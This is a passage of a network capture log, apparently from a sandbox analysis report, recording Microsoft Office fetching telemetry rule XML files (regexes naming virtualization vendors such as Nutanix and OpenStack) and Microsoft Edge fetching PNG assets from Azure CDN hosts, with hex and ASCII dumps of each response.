2024-11-11 09:33:27 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.5	49882	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:27 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:27 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:27 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: c8358f32-201e-005d-77d5-33afb3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093327Z-174f7845968vwdr7hC1EWRsh3w00000004mg000000008kxb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:27 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
99	192.168.2.5	49884	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: 1c14d510-c01e-0079-05d5-33e51a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968c2t8dhC1EWR8s2000000004e0000000006914 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
100	192.168.2.5	49885	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 4e338e66-401e-0016-6fd5-3353e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968v79b7hC1EWRu01s00000004fg000000000cs5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	49886	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	425	OUT	GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:28 UTC	536	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: image/png Content-Length: 1154 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:30 GMT ETag: 0x8DBD5935D5B3965 x-ms-request-id: a05c791c-d01e-0008-7a02-347374000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093328Z-174f7845968pf68xhC1EWRr4h80000000530000000000p15 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	1154	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 04 17 49 44 41 54 78 01 ed 97 cf 6f db 64 18 c7 bf 76 6a ea 34 69 e3 26 4b d4 b4 30 d2 f1 ab 4c 9a 96 c1 6e ed a1 30 0e 5c 10 4c b0 d3 0e ed 05 c1 05 35 3d ec 00 97 66 ff 41 72 43 02 a9 1a bb 70 03 c4 0d 6d 62 48 4c e2 f7 3a 0a 62 17 56 6b ab d6 aa cd 1a 37 4d 66 c7 89 fd ee 7d 9d 25 6b 1b 27 b1 1b 57 bd e4 23 39 f1 ef 7e fa 3c ef f3 bc 6f 80 1e 3d 8e 16 ce e9 8d c2 87 3f 24 4d 42 7e 04 88 04 2f e1 20 13 82 ac f9 e5 db 19 bb cb 3c 1c 62 10 73 d1 73 39 06 41 82 03 b7 80 d9 6f 6c df ed 38 82 13 5f 6f 10 b8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxodvj4i&K0Ln0\L5=fArCpmbHL:bVk7Mf}%k'W#9~<o=?$MB~/ <bss9Aol8_o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	49887	13.107.246.40	443	7640	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	431	OUT	GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 09:33:28 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: image/png Content-Length: 1468 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:14 GMT ETag: 0x8DBDCB5E23DFC43 x-ms-request-id: 8ecc46cc-c01e-001c-1e1c-34b010000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241111T093328Z-174f7845968jrjrxhC1EWRmmrs00000004y0000000002g5z Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	1468	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 51 49 44 41 54 78 01 ed 97 4b 6c 54 55 18 c7 ff e7 4e 19 62 da e0 b0 a1 01 03 5c 82 51 7c 52 16 1a 6d 6b 42 57 c4 c7 c2 2e 8c 26 24 46 62 44 17 26 b4 04 62 5c a0 ad 1a 63 dc c8 82 85 89 26 b4 09 68 89 1a a7 18 79 24 1a c6 05 75 41 02 17 19 23 46 03 13 10 4a 35 c8 50 fa 9a b9 f7 9c cf ef 3c ee 74 a6 96 76 da a6 2b e6 4b 4f ef cc b9 e7 9e ef 77 ff df e3 de 01 6a 56 b3 9a d5 ec ce 36 81 45 b6 cd 67 28 85 89 89 14 22 f8 20 e9 4b 0f 29 41 22 25 3c ac 85 42 8a a4 f2 a9 a8 52 8d e1 c5 d4 d5 70 75 3e 49 de a6 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaQIDATxKlTUNb\Q\|RmkBW.&$FbD&b\c&hy$uA#FJ5P<tv+KOwjV6Eg(" K)A"%<BRpu>I

Session ID	Source IP	Source Port	Destination IP	Destination Port
103	192.168.2.5	49888	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 65802b10-501e-000a-61d5-330180000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968jrjrxhC1EWRmmrs00000004t0000000009p67 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
104	192.168.2.5	49889	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 6193c1ec-701e-000d-35d5-336de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f78459684bddphC1EWRbht400000004d0000000008h9k x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
105	192.168.2.5	49890	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 4e338eb5-401e-0016-3ad5-3353e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f78459685m244hC1EWRgp2c00000004f0000000009zt0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
106	192.168.2.5	49891	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120660v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 485 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT ETag: "0x8DC582BB9769355" x-ms-request-id: d9045f06-101e-00a2-02d5-339f2e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968swgbqhC1EWRmnb4000000050g00000000032d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	485	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
107	192.168.2.5	49892	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120661v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:28 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 411 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989AF051" x-ms-request-id: 87508ad6-a01e-0098-68d5-338556000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f7845968l4kp6hC1EWRe884000000051g000000002p11 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:28 UTC	411	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
108	192.168.2.5	49893	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 09:33:28 UTC	192	OUT	GET /rules/rule120662v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 09:33:29 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Content-Type: text/xml Content-Length: 470 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBB181F65" x-ms-request-id: aedf17c0-c01e-0046-3ad5-332db9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T093328Z-174f78459684bddphC1EWRbht400000004hg000000002338 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 09:33:29 UTC	470	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
